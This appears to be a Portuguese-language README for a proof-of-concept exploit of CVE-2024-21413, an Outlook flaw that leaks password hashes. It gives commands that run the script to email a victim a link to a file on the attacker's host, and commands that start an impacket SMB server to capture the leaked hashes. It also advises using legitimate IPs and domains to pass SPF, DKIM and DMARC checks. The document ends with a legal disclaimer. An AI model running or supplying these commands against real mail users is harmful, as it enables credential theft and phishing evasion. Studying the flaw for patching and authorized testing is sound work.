
Vulnerabilidade de Divulgação de Informações do Microsoft Outlook (vazamento de hash de senha) - PoC CVE-2024-21413
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
[!NOTE] r00tb1t : é o arquivo de teste compartilhado (Word neste caso) da máquina do atacante (xx.xx.xx.xx).
Para garantir a conformidade com SPF, DKIM e DMARC, use $IP e domínio legítimos.
Certifique-se de instalar a biblioteca pexpect, caso ainda não o tenha feito, usando
pip install pexpect.
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf
- Kudooooos e detalhes sobre o CVE-2024-21413 .
- Solução Alternativa/Correção:
[!CAUTION] ⚠️ Aviso: IMPORTANTE: Este script é fornecido APENAS para fins educacionais, testes éticos e uso legal. Não o utilize em qualquer sistema ou rede sem permissão explícita. O acesso não autorizado a sistemas de computador e redes é ilegal, e usuários flagrados realizando atividades não autorizadas estão sujeitos a ações legais. O autor NÃO é responsável por qualquer dano causado pelo uso indevido deste script..